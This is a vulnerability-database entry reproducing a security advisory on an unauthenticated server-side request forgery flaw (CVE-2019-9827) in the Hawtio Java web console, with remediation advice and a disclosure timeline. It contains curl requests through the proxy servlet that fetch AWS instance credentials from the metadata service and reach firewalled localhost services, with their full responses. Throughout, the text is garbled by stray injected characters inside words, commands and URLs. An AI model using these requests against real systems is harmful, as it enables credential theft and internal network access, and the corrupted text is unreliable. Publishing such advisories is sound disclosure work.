Hawt Hawtio 代码问题漏洞

漏洞ID 1655222 漏洞类型 代码问题
发布时间 2019-07-05 更新时间 2020-07-29
CVE编号 CVE-2019-9827

CNNVD-ID CNNVD-201907-216
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019070026
http://www.cnnvd.org.cn/web5 i # s : H m/xxk/ldxqById.t/ = P C 3 e 0 w Jag?CNNVD=CNNVD-201907-216
|漏洞详情
Hawt Hawtio是一款用于管理Java内容的模块化Web控制台程序。
Hawt Hawtio 2.5.0及之前版本中存在代码问题漏洞。该/ 8 _ /漏洞P q w源于网络系统c G I l % s !或产L ? / p r品的代码开发过程中存在设计或实现不当的问题。
|漏洞EXP
CipherTechs Inc - Security Advisory[ % a 5 ) ] W h
Hawtio Server-Side Request F: V iorgery
Introduction
============
Hawtio (https://hawt.io/) is a modular web conso# c g v 1 N $ . hle for managing Java.
CipherTM * qechs d1 p ~ K $iscovered that Hawtio up to and including! s x E / b . ^ # version 2.5.0
is vulnerable to unauthenticated Server-Side Request Forgery (SSRF).
CVE
===
CVE-2019-9827
Affected Platforms and Versions
===============================
Product: Hawtio
Version: <= 2.5.0
Vulnerability OvL m * ! p 1 [erview
======================
Security risk: Medium
AttaE X Rck Vector: Remote
Vendor Status: Notified
Vulnerability Description
=========================
Hawtio_  n 8 by default allows for any unauthenticated user to visit the prox? 2 j ~ Y W a dy servln g e N wet page (/hawtio/proxy/).
Ap$ 0 0pending a destination server onto /proxy/ wil` % M # |l forward the request from
the Hawtio server. This c= 6 ( D f ` % Zan be especially dangerous ie E O ! n Dn AWS environments as
it's possible to request instance Metadata and retrieve sensitive information incl{ | o Tuding access keys.
This vulnerability is also dangerous as it could expose internal
applications which allow connections from the Hawtio server's IP a4 I } + Lddress.
Technical Details
===============~ * L 4 i 0==
By default, versions >= 1.5.0 have a whitelist which only al( 6 , / F J d #low connecti$ [ + : V + L Zons to 127.0.0.1.
Although the default whitelist settings prevent an aF ! U n :ttacker from ma) ( H F Z E m ;king a
request to any servers outside of the localhost - an attacker coz 0 K h G 3 w =uld still
request any in] u ~ ] Uternal service on the local Hawtio host.
For any Hawtio versions < 1.5.0 an unauthenticated can use the proxy servlet to make a request to any server.
Ha* J R a I O ( E Zwtio <= 1.4.68 - Obtaining AWS Access Keys via SSRF
-------------------= B N % [ T z--------Q e c--------------------------
$ curl -i http://hawtio-target:8080/hawtio/proxy/http://M G m s U ;169.254.169.254L I ~ Q { + :  6/latest
/meta-data/identity-credentials
/ec2/sec! h Z 3 p m m |urity-credentials/ec2-instance
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
Access-Control-Allow-Origin: *
Content-Type: text/plain
Accept-Rang{ G e Gesr B e % [: bytes
ETag: "38760414i j Y ; N ; s A85"
Last-Modified: Thu, 21 Mar 2019 19:36:06 GMTP Y a ! ~ O
Content-Length: 1318
Date: Thu, 21 Mar 2019 19:58:45 GMT
Server: EC2ws
{
"Code" : "Success",
"LasL g F J | dtUpdated" : "2019-03-21T19:35:50Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "[REDACTED]",
"SecretAccessKey" : "[RU Y = N ; W MEDACTED]",
"Token" : "[REDACTED]",
"Expiration" : "2019-03-22T01:38:33Z"
As shown above usi; ~ p y cng the proxy servlet allows any user to obtain AWS: @ w z b metadata information.
Hawtio 2.5.0
------------
$ curl -i http://hawtio-target:8080/hawtio/proxy/http://169.254.169.) g m ] O ; K % j254/latest
/meta-data/q N 0 ,identity-credentia 3 ^ N c Y } Bls
/ec2/security-credentials/ec2-instance
HTT$ ] =P/1.1 403 Forbidden
Date: Thu, 21 Mar 2019 20:06:16 GMT
Cache-ContD } M m ~ m 5 w crol: max-age=0, no-cache, must-revalidate,
proxy-revalidate,( H : ) 8 k / private
Pragma: no-cache
Access-Control-Allow-Origin: *
X-Frame-Options: SAMEORIGIN
X-XSS~ Z 6-Protection: 1
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'; script-src 'self'
'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline';
foE - D b X b T Bnt-src 'self' data:; connect-src 'self'; frame-src 'self'
Content-Type: application/jS { v [son
Content-Length: 29
Server: Jetty(9.4.z-SNAPSHOT)
{"reason":"HOST_NOT_ALLP 1 d h COWED"}
That said, an attacker coulO ; fd still access arbitrary internal services and bypass ingress traffic rules on Hawtio 2.5.0.
A demonstration c) Y ; zan be found below.
hawtio$ sudo ufw status numbered
Status: active
To                         Action      Fr6 F @ ` Z *  Xom
--                         ------y ? 7 d      ----
[ 1] 8080                       ALLOW IN    Anywhere
[ 2] 127.0.0.1 80/tcp           ALLOW IN    127.0.0.1
[ 3] 22/tcp                     ALLOW IN    Anywhere
$ curl -i http://hawtio-target/test.txt
curl: (7) Failed to connect to hawt% | p m V H _ +io-target port 80:
Connection refused
$ curl -i http://ham h H | ! fwtio-target:8080/hawtio/proxy/http://127.0.0.1/test.txt
HTTP/1.1 200 OK
Date: Thu, 21 Mar 2019 20:18:3w = D 3 H4 GMT
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate, private
Pragma: no-ca_ ` ( # vche
Access-Control-Allow-Origin: *
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
X-Content-] t ) ( k u [Type-Options: nosniff
Content-Secu# k i R x 4 u Arity-Policy: defauZ j | h C ? 2lt-src 'self'; script-src 'self'
'unsafe-inline' 'unsafeJ ) T @ L g-eval'; style-src 'self' 'unsafe-inline';
font-src 'self' data:; connect-src 'self'; fraC [ I i ) Sme-src 'self'
Server: SimpleHTTP/0.6 Python/2.7.13
Date: Thu, 21 Mar 2019 20:18:34m g  } k = * Y GMT
Content-Type: text/plain7 k Y 1 : 8 3
Last-Modified: Thu, 21 Mar 2019 20:07:34 GMT
Content-Ly S h d v Y Dength: 11
Secrets...
Recommendations
===============
Upgrade to at Hawtm a . 7 .io >=-h m ] y 8 | d x i1.5.0 to prevent SSRF from accesu ` d sing arbitrary URL2 3 5s. Services listening on localhost can still
be accessed through SSRF exploitation in versions > 1.5.0 so CipherTechs recommends disabling the proxy9 N J m I D servle{ 1 ) P K ^ kt
entL ) s v ! P / ` (irely. CipherTechs did notJ 9 W ^ % H ( p exhaustively test Hawtio so it is still not recommended to expose this developer tool on
the Iq $ j ` d C 2nternet.
In termsX ] f & h of proteb d  &cting AWS data, a daemon developed by Netflix-Skunkworksc K q _ * can be implemented to block
all connect_ E 9ions to AWS metadata (16_ } e 8 7 1 @ y b9.254.169.254). Only a designated user who runF G r + $ q Ms the proxy daemon can access the
metadata servic~ R Z U ) U Ne. CipherTechs published a blog post to
implement this solution here:  https://www.ciphertechs.com/protec1 Y L # J oting-aws-metadata-from-zero-day-ssrf-attacks/
Timeline
========
2019.02.25 - Vulnerability Discovered by CipherTechs
2019.03.27 - Redhat Notified
2019.06.27 - 90 day disclosure date
The contents of this advisory are CopyQ P - O L B P .right(c) 2019 CipherTechs Inc.
=====- * W % 5========================b S , m =====================I v t====================================
About CipherTechs CipherTechs is a global CyD 6 H O * u W dber Security service provider
founded in 2001 that remains privately held wita L 5h headquarters in New York
C e w 0 x bity. CipherTechs is exclusively focused on cyber security and proviB 6 J 2 Ade a
full service solution portfolio. We service our customers through the
following maJ ^ D Z x S ? tin practice areas: Offensive Security, Defensive Security,
MSSP and SOC, Audit and Compliance, Training and Product Procurement.
|参考8 & $ ] 8 ~ P ) Y资料

来源:www.ciphertechs.com

链接:https://www.ciphertW X ( 1echs.com/hawtio-advisory/

来源y s t |:packets@ G P Y o ~ # ptormsecurity.com

链接:https://packeC k q 1tstormsecurity.com/files/153524/Hawtio-2.5.0-Server-Side-ReqB 6 Nuest-Forgery.html

来源:nvd.I * $ + w I V 8 4nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-9827